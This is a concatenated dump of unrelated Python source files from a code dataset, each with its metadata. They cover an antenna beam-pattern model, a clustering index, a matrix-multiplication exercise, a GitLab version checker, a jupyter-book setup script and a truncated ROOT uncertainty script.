Q2[0:my_len_half]=Q_all[s2,0]*np.exp(1.0j*Q_all[s2,1]*deg2rad)\n \n #accumulate Q1 and Q2, scaled by excitation voltage\n Q1_accum=Q1_accum+Q1*Vcplx[ant_i]\n Q2_accum=Q2_accum+Q2*Vcplx[ant_i]\n self.beam_modes[pols[pol]]={'Q1':Q1_accum,'Q2':Q2_accum,\n 'M':M_accum, 'N':N_accum} \n\n def get_response(self, phi_arr, theta_arr):\n \"\"\"Calculate full Jones matrix response (E-field) of beam for \n one or more spherical coordinates\n\n Input: \n phi_arr and theta_arr are single values or arrays of equal shape \n \n phi_arr - azimuth angles (radians), north through east.\n theta_arr - zenith angles (radian)\n \n Output:\n Jones - A multi-dimensional array, comprising an array of shape(phi_arr), \n with [2][2] at the start for the Jones vectors, where \n [J_11=Xtheta J_12=Xphi]\n [J_21=Ytheta J_21=Yphi]\n \"\"\"\n \n #==============================================================================\n # Code showing that (Jones, az, za) is faster than (az, za, Jones)\n # a = np.random.rand(5000, 5000, 2, 2)\n # timeit -n 100 a[:,:,0,0].sum()\n # -> 100 loops, best of 3: 55.2 ms per loop\n # b = np.random.rand(2,2,5000, 5000)\n # timeit -n 100 b[0,0].sum()\n # -> 100 loops, best of 3: 18.1 ms per loop\n #==============================================================================\n \n #Convert to numpy array (if not already numpy array)\n try:\n phi_arr=np.array(phi_arr, copy=False, ndmin=1)\n theta_arr=np.array(theta_arr, copy=False, ndmin=1)\n except:\n e = 'Unable to convert theta and phi to numpy arrays'\n logger.error(e)\n raise ValueError(e) \n \n if phi_arr.ndim == 0 and theta_arr.ndim == 0: #Convert single value to array\n phi_arr = np.reshape(phi_arr, (1)) \n theta_arr = np.reshape(theta_arr, (1)) \n #Calculate for each point\n logger.debug('Calculating beam for each point in %s... %s'%(phi_arr.shape,datetime.datetime.now().time()))\n Jones = self.get_FF(phi_arr, theta_arr, grid=False)\n \n return Jones\n \n def get_interp_response(self, phi_arr, theta_arr, pixels_per_deg=5):\n \"\"\"Calculate full Jones matrix response (E-field) of beam interpolated \n from a beam calculated on a 2-D grid of spherical coordinates at \n resolution pixels_per_deg pixels per degree.\n Where the input is many unique theta and phi coordinates, \n this approach is faster than calculating the response for each \n unique coordinate. \n\n Input: \n phi_arr and theta_arr are arrays of equal shape defining points \n where the response is required\n \n phi_arr - azimuth angles (radians), north through east.\n theta_arr - zenith angles (radian)\n pixels_per_deg - number of pixels per degree along phi and theta axes \n which is then interpolarted on the phi_arr,theta_arr coords\n \n Output:\n Jones - A 4-D array, comprising a 2-D array of shape(phi_arr), \n with [2][2] at the start for the Jones vectors, where \n [J_11=Xtheta J_12=Xphi]\n [J_21=Ytheta J_21=Yphi]\n \"\"\"\n \n #RegularGridInterpolator only needed for this function.\n #FIXME: version check, as it's not available on earlier scipy versions\n from scipy.interpolate import RegularGridInterpolator\n \n #TODO: find min & max of phi_arr & theta_arr so that a subset of the \n #grid can be calculated (instead of the whole 0-360, 0-90 grid)\n \n #Convert to numpy array (if not already numpy array)\n try:\n phi_arr=np.array(phi_arr, copy=False, ndmin=1)\n theta_arr=np.array(theta_arr, copy=False, ndmin=1)\n \n except:\n e = 'Unable to convert theta and phi to numpy arrays'\n logger.error(e)\n raise ValueError(e) \n\n logger.debug('Calculating a gridded beam and interpolating onto coordinates of shape %s...'%(phi_arr.shape,))\n #Interpolate from gridded beam\n Jones=np.zeros((2,2)+np.shape(phi_arr),dtype=np.complex128)\n \n logger.debug('Calculating gridded beam (Az=0-360, ZA=0-90) at angular resolution %s pixels per degree... %s'%(pixels_per_deg, datetime.datetime.now().time()))\n if pixels_per_deg < 5:\n logger.warning(\"Resolution along theta, phi axes is less than 5 pixels per degree. Results may be less reliable\") \n\n #Calculate beam for a phi (NtE), theta grid with angular resolution specified by pixels_per_deg. \n mygrid=get_grid('rad', pixels_per_deg) \n gridded_Jones=self.get_FF(mygrid['phi_1D'], mygrid['theta_1D'],grid=True)\n \n logger.debug('Interpolating... %s'%datetime.datetime.now().time())\n for i in [0,1]:\n for ii in [0,1]:\n #Interpolate real and imag separately (just to be sure) and reconstruct\n my_interp_fn_real=RegularGridInterpolator((mygrid['phi_1D'], mygrid['theta_1D']), \n gridded_Jones[i,ii].real,\n bounds_error=False) #bounds_error=False interpolates NaNs to NaN\n my_real=my_interp_fn_real(np.dstack([phi_arr, theta_arr]))\n \n my_interp_fn_imag=RegularGridInterpolator((mygrid['phi_1D'], mygrid['theta_1D']), \n gridded_Jones[i,ii].imag,\n bounds_error=False) #bounds_error=False interpolates NaNs to NaN\n my_imag=my_interp_fn_imag(np.dstack([phi_arr, theta_arr])) \n Jones[i,ii]=my_real+1j*my_imag\n logger.debug('Done... %s'%datetime.datetime.now().time())\n\n return Jones \n \n def get_FF(self, phi_arr, theta_arr, grid):\n \"\"\" \n Converts the beam object's spherical harmonics to a Jones matrix of \n an E-field (polarized in \\hat{theta} and \\hat{phi}).\n \n Input:\n phi_arr - Array of azimuth angles (radians), north through east\n theta_arr - Array of zenith angles \n grid - If True, will return a 2-D array based on input theta, phi. \n If False will return a array of size of input theta, phi.\n \n Output:\n #E_P - phi polarized field\n #E_T - theta polarazed field\n Sigma_T - Sigma_T is theta polarized field without the\n sqrt(Zo/(2pi))*7exp(-jbeta r)/r factor\n Sigma_P - Similarly for Sigma_P\"\"\"\n \n if grid==True:\n #Create 4-D Jones matrix of shape: 2 x 2 x n_phi x n_theta\n if phi_arr.ndim != 1 and theta_arr.ndim != 1:\n e='For gridded beam, theta (shape %s) and phi (shape %s) must be 1-D arrays'%\\\n (np.shape(theta_arr),np.shape(phi_arr))\n logger.error(e)\n raise ValueError(e)\n Jones=np.zeros((2,2,len(phi_arr),len(theta_arr)),dtype=np.complex128) \n else:\n #Create Jones matrix of shape: 2 x 2 x shape(phi_arr) \n if phi_arr.shape != theta_arr.shape:\n e='Theta (shape %s) and phi (shape %s) must be the same shape'%\\\n (np.shape(theta_arr),np.shape(phi_arr))\n logger.error(e)\n raise ValueError(e) \n Jones=np.zeros((2,2)+np.shape(phi_arr),dtype=np.complex128)\n \n counter=10000 #Counter for messages\n \n phi_arr=math.pi/2-phi_arr #Convert to East through North (FEKO coords)\n phi_arr[phi_arr < 0] += 2*math.pi #360 wrap\n\n pols=['X','Y']\n for pol in [0,1]: \n #Extract modes for this pol\n M=self.beam_modes[pols[pol]]['M']\n N=self.beam_modes[pols[pol]]['N'] \n Q1=self.beam_modes[pols[pol]]['Q1']\n Q2=self.beam_modes[pols[pol]]['Q2'] \n \n #form P(cos\\theta)/(sin\\theta) and P^{m+1}(cos\\theta)with FEKO M,N order\n nmax=int(np.max(N))\n if np.max(N)-nmax !=0:\n logger.error('The maximum of N should be an integer value!')\n \n #form pre-multiplying constants in (1) of \"Calculating....\"\n C_MN=(0.5*(2*N+1)*misc.factorial(N-abs(M))/misc.factorial(N+abs(M)))**0.5\n \n MabsM=-M/np.abs(M)\n MabsM[MabsM==np.NaN]=1 #for M=0, replace NaN with MabsM=1; \n MabsM=(MabsM)**M\n \n if len(phi_arr.ravel()) > counter:\n logger.debug('Time is %s'%datetime.datetime.now().time())\n logger.warning('Calculating for %s points. This may take a while!'%len(phi_arr.ravel()))\n \n #determine unique thetas, phis to speed up calculations\n if grid == False: \n phi_unique=np.unique(phi_arr) \n theta_unique=np.unique(theta_arr) #speeds up calculations\n else: #We expect all to be unique \n phi_unique=phi_arr\n theta_unique=theta_arr\n \n #determine phi-dependent component\n logger.debug('determine %s phi-dependent components...%s'%(len(phi_unique),datetime.datetime.now().time()))\n phi_comp=np.zeros((len(phi_unique),len(M)),dtype=np.complex128)*np.NaN\n for idx in np.arange(len(phi_unique)):\n #TODO: can this loop be vectorised?\n phi_comp[idx,:]=np.exp(1.0j*M*phi_unique[idx])*C_MN*MabsM/(N*(N+1))**0.5;\n \n #determine theta-dependent components\n #nomenclature:\n #T and P are the sky polarisations theta and phi\n #theta and phi are direction coordinates\n logger.debug('determine %s theta-dependent components...%s'%(len(theta_unique),datetime.datetime.now().time()))\n emn_T=np.zeros((len(theta_unique),len(M)),dtype=np.complex128)*np.NaN\n emn_P=emn_T*np.NaN #make copy\n \n for idx in range(len(theta_unique)):\n (P_sin,P1) = P1sin(nmax,theta_unique[idx]); #theta in radian\n #form emn theta and phi\n u=np.cos(theta_unique[idx]);\n emn_T[idx,:]=(1.0j)**N*(P_sin*(np.abs(M)*Q2*u-M*Q1)+Q2*P1)\n emn_P[idx,:]=(1.0j)**(N+1)*(P_sin*(M*Q2-np.abs(M)*Q1*u)-Q1*P1)\n \n logger.debug('calculate sigma...%s'%datetime.datetime.now().time())\n if grid==True: #Calculate via gridded approach\n #This method is faster than fully vectorised method\n # logger.debug('Loop...%s'%datetime.datetime.now().time())\n Sigma_P=np.zeros((len(phi_unique),len(theta_unique)),dtype=np.complex128)\n Sigma_T=np.zeros((len(phi_unique),len(theta_unique)),dtype=np.complex128) \n for t_i in range(len(theta_arr)):\n Sigma_P[:,t_i]=np.sum(np.tile(emn_P[t_i,:],(len(phi_arr),1))*phi_comp,axis=1)\n Sigma_T[:,t_i]=np.sum(np.tile(emn_T[t_i,:],(len(phi_arr),1))*phi_comp,axis=1) \n #Fully vectorised method:\n # phi_comp_tiled=np.tile(phi_comp[:,np.newaxis],[1,len(theta_unique),1])\n # Sigma_P=np.sum(np.tile(emn_P[np.newaxis],[len(phi_unique),1,1])*phi_comp_tiled,axis=2)\n # Sigma_T=np.sum(np.tile(emn_T[np.newaxis],[len(phi_unique),1,1])*phi_comp_tiled,axis=2) \n else: #Calculate for every value in theta,phi \n #Arrays/single value to fill\n Sigma_P=np.zeros(np.shape(phi_arr),dtype=np.complex128)*np.NaN\n Sigma_T=np.zeros(np.shape(theta_arr),dtype=np.complex128)*np.NaN\n #Loop through every theta,phi and calculate sigma\n for idx in range(len(phi_arr.ravel())): \n #Find location of phis and thetas\n phi_idx=(phi_unique==phi_arr.flat[idx])\n theta_idx=(theta_unique==theta_arr.flat[idx])\n #For this phi value, calculate sigmas (using the appropriate sigma values)\n Sigma_P.flat[idx]=np.sum(emn_P[theta_idx,:,]*phi_comp[phi_idx,:]) #emn_P.*Const\n Sigma_T.flat[idx]=np.sum(emn_T[theta_idx,:]*phi_comp[phi_idx,:]) #emn_T.*Const\n if idx%counter==0:\n logger.debug('Index %s of %s: %s'%(idx, len(phi_arr.ravel()), datetime.datetime.now().time()))\n #to match with FEKO (neglects: exp(jbeta r)/r factor)\n logger.debug('Done... %s'%datetime.datetime.now().time())\n \n # mu0=4*math.pi*1e-7\n # eps0=8.85418781761e-12\n # Zo=(mu0/eps0)**0.5\n # sqrt_fac=(Zo/(2*math.pi))**0.5\n #\n # E_P=sqrt_fac*Sigma_P\n # E_T=sqrt_fac*Sigma_T\n\n #Save for this polarisation\n Jones[pol,0]=Sigma_T\n Jones[pol,1]=Sigma_P\n return Jones\n \ndef P1sin(nmax,theta):\n \"\"\"Create the Legendre function flavors for FF expansion using spherical wave\n See:\n Calculating Far-Field Radiation Based on FEKO Spherical Wave Coefficients, \n draft 10 June 2015\n 14/07/2015: ATS - using slope estimator for u=1/-1 (forward/backward\n difference)\n \n Input:\n 1. theta (rad) is the cos\\theta or sin\\theta arguments\n 2. nmax is maximum n from FEKO Q1mn and Q2mn, n must be >=1\n \n Output:\n 1. P_sin: P_{n}^{|m|}(cos\\theta)/sin(theta) with FEKO order M,N \n 1. P1: P_{n}^{|m|+1}(cos\\theta) with FEKO order M,N\"\"\"\n \n #initialize for nmax, we have 2(1+...+nmax)+nmax=nmax^2+2*nmax long array\n P_sin=np.zeros((nmax**2+2*nmax),dtype=np.complex128)\n P1=P_sin*0 #copy\n \n #theta arguments\n u=np.cos(theta)\n sin_th=np.sin(theta)\n delu=1e-6; # for slope estimation\n \n #step from 1 to nmax\n for n in range(1,nmax+1):\n \n #legendre P_{n}^{|m|=0...n} (u)\n orders=np.arange(0,n+1)\n orders=orders.reshape(n+1,1)\n P=lpmv(orders,n,u)\n \n ##THESE ARE THE SAME:\n ##legendre(2,0:0.1:0.2) (matlab)\n ##scipy:\n ##a=np.arange(0,3)\n ##a=a.reshape(3,1)\n ##lpmv(b,2,np.arange(0,0.3,0.1)) \n \n #P_{n}^{|m|+1} (u)\n Pm1=np.append(P[1::],0) #I should just be able to use orders=np.arange(1,n+1), then append zero?\n Pm1=Pm1.reshape(len(Pm1),1) #FIXME: can probably make this and others 1-D\n #P_{n}^{|m|}(u)/sin_th\n Pm_sin=np.zeros((n+1,1),dtype=np.complex128) #initialize\n #parameters\n l=np.arange(0,n/2+1)\n\n if u==1:\n #special treatment depending on m;\n #for m=0, m=0 Pm_sin=inf so, the product m*Pm_sin is zero;\n #for m=1, we need a substitution\n #approach 1: based on E-9 in Harrington, this is not stable\n #for n>~45\n #Pm_sin(2,1)=-sum(((-1).^l.*factorial(2.*n-2.*l).*(n-2.*l))...\n # ./(2.^n.*factorial(l).*factorial(n-l).*factorial(n-2.*l)));\n #approach 2: based on slope estimate \n #Pn(cos x)/sin x = -dPn(u)/du\n Pu_mdelu=lpmv(orders,n,u-delu)\n\n Pm_sin[1,0]=-(P[0]-Pu_mdelu[0])/delu #backward difference\n \n #m>=2, value is 0, so initial values are OK\n elif u==-1:\n #approach 1: based on E-9 in Harrington, this is not stable\n #for n>~45\n #Pm_sin(2,1)=-sum(((-1).^l.*factorial(2.*n-2.*l).*(n-2.*l).*(-1).^(n-2.*l-1))...\n # ./(2.^n.*factorial(l).*factorial(n-l).*factorial(n-2.*l)));\n #approach 2: based on slope estimate \n #Pn(cos x)/sin x = -dPn(u)/du\n Pu_mdelu=lpmv(orders,n,u-delu)\n Pm_sin[1,0]=-(Pu_mdelu[0]-P[0])/delu #forward difference\n else:\n Pm_sin=P/sin_th\n \n #accumulate Psin and P1 for the m values\n ind_start=(n-1)**2+2*(n-1) #start index to populate\n ind_stop=n**2+2*n; #stop index to populate\n #assign\n P_sin[np.arange(ind_start,ind_stop)]=np.append(np.flipud(Pm_sin[1::,0]),Pm_sin)\n P1[np.arange(ind_start,ind_stop)]=np.append(np.flipud(Pm1[1::,0]),Pm1)\n return (P_sin,P1)\n \n\ndef get_grid(unit, pixels_per_deg):\n \"\"\"Return phi (Az), theta (ZA) grid\n Input: \n unit - 'deg' or 'rad'\n pixels_per_deg - number of pixels per degree along phi and theta axes\"\"\" \n \n logger.debug('Setting up phi (Az), theta (ZA) grid %s pixels per deg'%pixels_per_deg)\n degs_per_pixel=1./pixels_per_deg;\n n_phi=360/degs_per_pixel+1;\n n_theta=90/degs_per_pixel+1;\n logger.debug('%s pixels on phi axis'%n_phi)\n logger.debug('%s pixels on theta axis'%n_theta)\n\n theta_1D=np.arange(0,n_theta)*degs_per_pixel \n phi_1D=np.arange(0,n_phi)*degs_per_pixel\n if unit=='rad':\n theta_1D*=deg2rad\n phi_1D*=deg2rad\n theta=np.tile(theta_1D,(n_phi,1))\n phi=(np.tile(phi_1D,(n_theta,1))).T\n\n return {'theta':theta,'phi':phi, 'theta_1D':theta_1D,'phi_1D':phi_1D}\n \nif __name__ == \"__main__\":\n\n logger.setLevel(logging.DEBUG)\n h5filepath=pb.h5file # recent version was MWA_embedded_element_pattern_V02.h5\n target_freq_Hz=150e6 \n logger.debug('Initialising ApertureArray object with h5filepath = %s' % h5filepath)\n tile=ApertureArray(h5filepath,target_freq_Hz)\n# tile.calc_zenith_norm_fac()\n \n# my_Astro_Az=26.5651\n# my_ZA=15.3729 \n# delays=np.array([6, 7, 8, 9, 4, 5, 6, 7, 2, 3, 4, 5, 0, 1, 2, 3])\n##\n# my_Astro_Az=0\n# my_ZA=28 \n# delays=np.array([6,6,6,6,4,4,4,4,2,2,2,2,0,0,0,0])\n# \n my_Astro_Az=0\n my_ZA=0 \n delays=np.zeros([2,16]) #Dual-pol.\n \n amps=np.ones([2,16])\n\n logger.debug('Set up beam object')\n mybeam=Beam(tile, delays, amps=amps)\n\n grid=True #Use interpolated\n if grid:\n logger.debug('Get Az,El points')\n pixels_per_deg=2 \n mygrid=get_grid('rad',pixels_per_deg) \n az=mygrid['phi']\n za=mygrid['theta']\n logger.debug('Interpolate from beam') \n Jones=mybeam.get_interp_response(az, za)\n logger.debug('Normalise to zenith') \n Jones=tile.apply_zenith_norm_Jones(Jones)\n #Jones=mybeam.get_response(az, za, grid=grid)\n else:\n logger.info('Get response for mygrid Az,El')\n Jones=mybeam.get_response(az, za)\n\n logger.debug('Plot and save')\n my_Astro_Az='%.0f'%my_Astro_Az\n my_ZA='%.0f'%my_ZA\n \n point_dirn='Az%s-ZA%s'%(my_Astro_Az,my_ZA)\n filebase='%s-%sPixPerDeg-%s'%(point_dirn,pixels_per_deg,grid)\n title='Az_NtE=%s, ZA=%s\\n'%(my_Astro_Az,my_ZA)\n\n import beam_tools\n #Get cut at pointing direction\n idx=az==(float(my_Astro_Az)*deg2rad)\n cut_1D=Jones[:,:,idx]\n\n #Plot jones matrices\n beam_tools.plotArrayJones(Jones,target_freq_Hz,filebase,title,pixels_per_deg,cut_1D)\n\n #Plot power for XX and YY\n beam_tools.plotVisResponse(Jones,target_freq_Hz,filebase,title,pixels_per_deg,gridded=True)\n\n #Export to .mat file for verification against matlab code\n beam_tools.exportArrayJones(Jones,target_freq_Hz,filebase)\n\n #Project onto hemishpere and re-run plots and write to fits files\n logger.debug('Project beam on hemisphre')\n proj='SIN'\n [az,za]=beam_tools.makeAZZA(1000,proj)\n grid=True\n pixels_per_deg=5\n Jones=mybeam.get_interp_response(az, za, pixels_per_deg=pixels_per_deg)\n Jones=tile.apply_zenith_norm_Jones(Jones) #Normalise\n \n writetofits=False\n if writetofits: \n vis=beam_tools.makeUnpolInstrumentalResponse(Jones,Jones)\n from astropy.io import fits\n filename='beam_%sMHz_%s_E-W.fits'%(target_freq_Hz/1e6,proj)\n fits.writeto(filename, np.abs(vis[0,0])) \n filename='beam_%sMHz_%s_N-S.fits'%(target_freq_Hz/1e6,proj) \n fits.writeto(filename, np.abs(vis[1,1]))\n filename='%s_az.fits'%(proj) \n fits.writeto(filename, az)\n filename='%s_ZA.fits'%(proj)\n fits.writeto(filename, za) \n\n filebase='%s-%sPixPerDeg-%s'%(point_dirn,pixels_per_deg,grid) \n beam_tools.plotArrayJones(Jones,target_freq_Hz,filebase+'_'+proj,title,pixels_per_deg)\n beam_tools.plotVisResponse(Jones,target_freq_Hz,filebase+'_'+proj,title,pixels_per_deg)\n\n","sub_path":"beam_full_EE.py","file_name":"beam_full_EE.py","file_ext":"py","file_size_in_byte":32952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"244749884","text":"def dunn(c, distances):\n \"\"\"\n Dunn index for cluster validation (the bigger, the better)\n \"\"\"\n unique_cluster_distances = np.unique(min_cluster_distances(c, distances))\n max_diameter = max(diameter(c, distances))\n\n if np.size(unique_cluster_distances) > 1:\n return unique_cluster_distances[1] / max_diameter\n else:\n return unique_cluster_distances[0] / max_diameter\n\ndef min_cluster_distances(c, distances):\n \"\"\"Calculates the distances between the two nearest points of each cluster\"\"\"\n min_distances = np.zeros((max(c) + 1, max(c) + 1))\n for i in np.arange(0, len(c)):\n if c[i] == -1: continue\n for ii in np.arange(i + 1, len(c)):\n if c[ii] == -1: continue\n if c[i] != c[ii] and distances[i, ii] > min_distances[c[i], c[ii]]:\n min_distances[c[i], c[ii]] = min_distances[c[ii], c[i]] = distances[i, ii]\n return min_distances\n\ndef diameter(c, distances):\n \"\"\"Calculates cluster diameters (the distance between the two farthest data points in a cluster)\"\"\"\n diameters = np.zeros(max(c) + 1)\n for i in np.arange(0, len(c)):\n if c[i] == -1: continue\n for ii in np.arange(i + 1, len(c)):\n if c[ii] == -1: continue\n if c[i] != -1 or c[ii] != -1 and c[i] == c[ii] and distances[i, ii] > diameters[c[i]]:\n diameters[c[i]] = distances[i, ii]\n return diameters ","sub_path":"TP_ABDOU-NGUYEN_NGOC-BIEN/TP_MachineLearning/dunn.py","file_name":"dunn.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"517164015","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Oct 4 23:54:45 2020\r\n\r\n@author: keyen\r\n\"\"\"\r\n#Custom fucntion to multiply two matrices\r\ndef matrixmult(A,B):\r\n m=A.shape[0]\r\n n=A.shape[1]\r\n p=B.shape[1]\r\n f=np.zeros((m,p),dtype='int')\r\n if (A.shape[1]==B.shape[0]):\r\n for j in range(m):\r\n for k in range(p):\r\n f[j][k]=sum(A[j][r]*B[r][k] for r in range(n)) \r\n else:\r\n print('Shapes of the matrices do not match')\r\n \r\n return f\r\n\r\n#Function to check if two matrices are equal\r\ndef isSame(A,B):\r\n m=A.shape[0]\r\n n=A.shape[1]\r\n p=B.shape[1]\r\n for i in range(m):\r\n for j in range(n):\r\n if (A[i][j] != B[i][j]):\r\n return 0\r\n return 1\r\n#function to generate a random matrix as an array\r\ndef randmat(m,n,intervala=-5,intervalb=5):\r\n matrics=[]\r\n mtemp=[]\r\n for k in range(m):\r\n temp=[]\r\n for j in range(n):\r\n temp=[] \r\n temp=random.randint(intervala,intervalb)\r\n matrics.append(temp)\r\n mtemp=np.array(matrics)\r\n mtemp=mtemp.reshape(m,n)\r\n return mtemp\r\n\r\n\r\n#Example Program\r\n\r\nimport numpy as np\r\nimport time\r\nimport random\r\n\r\nprint(\"This program multiplies two random matrices of size A(m,n) and B(n,p) and compare the results with the built in function\")\r\nprint()\r\n\r\nprint(\"\")\r\nchoice=int(input(\"The size is determined randomly, press 1 to enter manually and press any number to continue \"))\r\ntry: \r\n choice\r\n if choice==1:\r\n print(\"Enter desired size of the matrices, A(m,n) and B(n,p) when prompted\")\r\n print()\r\n m=int(input(\"Enter m = \"))\r\n n=int(input(\"Enter n = \"))\r\n p=int(input(\"Enter p = \"))\r\n else:\r\n m=random.randint(1,10)\r\n n=random.randint(1,10)\r\n p=random.randint(1,10)\r\nfinally:\r\n martisA=randmat(m,n)\r\n martisB=randmat(n,p)\r\n \r\n#Comparison with inbuilt function \r\ncustomResult=matrixmult(martisA,martisB)\r\npythonResult=np.dot(martisA,martisB)\r\n\r\n#print results \r\nprint(\"\\nMatrix A = \\n\\n\", martisA)\r\nprint(\"\\nMatrix B = \\n\\n\", martisA)\r\nprint(\"\\nDot product using custom function \\n\\n\", customResult)\r\nprint(\"\\nDot product using inbuilt function\\n\\n\", pythonResult)\r\n\r\nif (isSame(customResult,pythonResult)==1):\r\n print('\\n\\nThe two methods yield the same result\\n\\n')","sub_path":"Assignment1/Vishnu_206106025/A1_Q9.py","file_name":"A1_Q9.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"181785386","text":"from ._checker import UpstreamChecker, NO_VERSION\nfrom ..gitlab_utils import GitLabUtils\nfrom gitlab.exceptions import GitlabError\n\n\nclass GitLabChecker(UpstreamChecker, GitLabUtils):\n \"\"\"\n Class for checking latest possible releases of given repository by\n release or tag release.\n Uses GitLab API v4: https://docs.gitlab.com/ee/api/\n \"\"\"\n\n def __init__(self, tool_info: dict, **kwargs):\n \"\"\"\n Please use token, with zero scopes defined!\n It is enough to be functional and rise API limit.\n \"\"\"\n UpstreamChecker.__init__(self, tool_info=tool_info, **kwargs)\n GitLabUtils.__init__(\n self,\n url=self.uri,\n namespace=self.repository,\n project=self.tool,\n token=kwargs.get(\"token\", \"\")\n )\n\n def _get_version(self, curr_ver: str = \"\"):\n if self.method == \"release\":\n self._by_release()\n elif self.method == \"tag-release\":\n self._by_tag()\n else:\n self.logger.error(\n f\"Invalid query method for {self.provider} in tool {self.project}.\"\n )\n self.version = NO_VERSION\n\n def _fail(self, r=None, e: GitlabError = None):\n \"\"\"\n Set version for not defined on fail, log error.\n \"\"\"\n self.version = NO_VERSION\n self.logger.error(\n f\"Failed to fetch version update information for {self.project}: {e}\"\n )\n\n def _by_release(self):\n \"\"\"\n Method for finding latest release from repository.\n \"\"\"\n try:\n r = self.get_releases()\n if r:\n self.version = r[0].name\n else:\n self.logger.debug(f\"No releases found for {self.project} with {self.provider}\")\n except GitlabError as e:\n self._fail(e=e)\n\n def _by_tag(self):\n \"\"\"\n Method for finding latest tag.\n \"\"\"\n try:\n r = self.get_tags()\n if r:\n self.version = r[0].name\n else:\n self.logger.debug(f\"No tags found for {self.project} with {self.provider}\")\n except GitlabError as e:\n self._fail(e=e)\n\n\n'''\n def _by_commit(self, current_commit: str = \"\"):\n \"\"\"\n Get latest commit of repository in master branch.\n If comparable commit is given, it also tells how many commits\n given commit is behind master.\n \"\"\"\n if current_commit:\n r = self.session.get(\n f\"{self.api}/{self.author}%2F{self.project}/repository/compare/master?from=master&to{current_commit}\n )\n if r.status_code == 200:\n self.extra_info = f\"{r.json().get('behind_by')} commits behind master.\"\n self.version = r.json().get(\"base_commit\").get(\"sha\")\n else:\n self._fail(r)\n else:\n r = self.session.get(\n f\"{self.api}/{self.author}%2F{self.project}/repository/commits/master\"\n )\n if r.status_code == 200:\n self.version = r.json().get(\"sha\")\n self.extra_info = \"Current commit in master.\"\n else:\n self._fail(r)\n\n\n def _get_date_of_commit(self, sha: str) -> datetime.datetime:\n \"\"\"\n Get date of commit by commit hash.\n \"\"\"\n r = self.session.get(\n f\"{self.api}/{self.author}%2F{self.project}/repository/tags\"\n )\n if r.status_code != 200:\n self.logger.error(\n f\"Unable to fetch date time for commit in tool {self.tool}: {r.json().get('message')}\"\n )\n raise ValueError\n return datetime.datetime.strptime(\n r.json()[0].get(\"commit\").get(\"committed_date\"), \"%Y-%m-%dT%H:%M:%S.%f%z\"\n )\n'''\n","sub_path":"cincanregistry/checkers/gitlab.py","file_name":"gitlab.py","file_ext":"py","file_size_in_byte":3849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"617106761","text":"from setuptools import setup, find_packages\nimport os\nimport os.path as op\nfrom glob import glob\nfrom pathlib import Path\n\nversion = [\n line\n for line in Path(\"jupyter_book/__init__.py\").read_text().split()\n if \"__version__\" in line\n]\nversion = version[0].split(\" = \")[-1]\n\nsetup(\n name=\"jupyter-book\",\n version=version,\n python_requires=\">=3.6\",\n author=\"Project Jupyter Contributors\",\n author_email=\"jupyter@googlegroups.com\",\n url=\"https://jupyterbook.org/\",\n project_urls={\n \"Documentation\": \"https://jupyterbook.org\",\n \"Funding\": \"https://jupyter.org/about\",\n \"Source\": \"https://github.com/jupyter/jupyter-book/\",\n \"Tracker\": \"https://github.com/jupyter/jupyter-book/issues\",\n },\n # this should be a whitespace separated string of keywords, not a list\n keywords=\"reproducible science environments scholarship notebook\",\n description=\"Jupyter Book: Create an online book with Jupyter Notebooks\",\n long_description=open(\"./README.md\", \"r\").read(),\n long_description_content_type=\"text/markdown\",\n license=\"BSD\",\n packages=find_packages(),\n install_requires=[\n \"pyyaml\",\n \"docutils>=0.15\",\n \"sphinx\",\n \"myst-nb~=0.2.1\",\n \"click\",\n \"setuptools\",\n \"sphinx\",\n \"nbformat\",\n \"nbconvert\",\n \"nbclient\",\n (\n \"sphinx_togglebutton @ \"\n \"https://github.com/ExecutableBookProject/sphinx-togglebutton/archive/master.zip\"\n ),\n \"sphinx-copybutton\",\n \"sphinxcontrib-bibtex\",\n (\n \"sphinx_book_theme @ \"\n \"https://github.com/ExecutableBookProject/sphinx-book-theme/archive/master.zip\"\n ),\n ],\n extras_require={\n \"sphinx\": [\"folium\", \"numpy\", \"matplotlib\", \"ipywidgets\", \"pandas\", \"nbclient\"],\n \"testing\": [\"coverage\", \"pytest>=3.6,<4\", \"pytest-cov\", \"beautifulsoup4\"],\n },\n entry_points={\n \"console_scripts\": [\n \"jb = jupyter_book.commands:main\",\n \"jupyter-book = jupyter_book.commands:main\",\n ],\n },\n package_data={\"jupyter_book\": [\"book_template/*\",]},\n include_package_data=True,\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"301591928","text":"#!/usr/bin/env python\n#import sys\n#import os\n#import re\n#from uncertainty_unfold import *\nimport ROOT\nfrom ROOT import gROOT, TGraph, TLatex, TCanvas, TPad, TFile, TH1, TH2D, TF1, TLatex, TMath, TROOT, TTree, TString, TH2, TStyle, TLegend, THStack\nfrom array import array\ndef get_jecr_1D(which_region, outdir, which_sample, uncertainty_hist_name, infilename, var_name, lumi, hist_name, draw_op ):\n f_in = TFile.Open(infilename)\n h_center = f_in.Get(hist_name)\n h_up = f_in.Get(hist_name+uncertainty_hist_name+\"_up\")\n h_down = f_in.Get(hist_name+uncertainty_hist_name+\"_down\")\n h_center.Scale(lumi)\n #h_center.Print(\"all\")\n\n h_up.Scale(lumi)\n h_down.Scale(lumi)\n\n h_center.SetLineColor(2)\n h_up.SetLineColor(4)\n h_down.SetLineColor(3)\n\n h_center.SetStats(0)\n h_up.SetStats(0)\n h_down.SetStats(0)\n\n NbinsX = h_center.GetNbinsX()\n NbinsY = h_center.GetNbinsY()\n\n Nbins = NbinsX*NbinsY\n h_uncertainty = []\n\n uncertainty = 0\n for j in range(NbinsX) :\n max_diff = max(0, abs(h_center.GetBinContent(j+1)-h_up.GetBinContent(j+1)), abs(h_center.GetBinContent(j+1)-h_down.GetBinContent(j+1)))\n uncertainty = 0\n if(h_center.GetBinContent(j+1) > 0) :\n uncertainty = max_diff/h_center.GetBinContent(j+1)\n h_uncertainty.append(uncertainty) \n\n if draw_op == 'on':\n c1 = TCanvas(uncertainty_hist_name,uncertainty_hist_name,900,600)\n 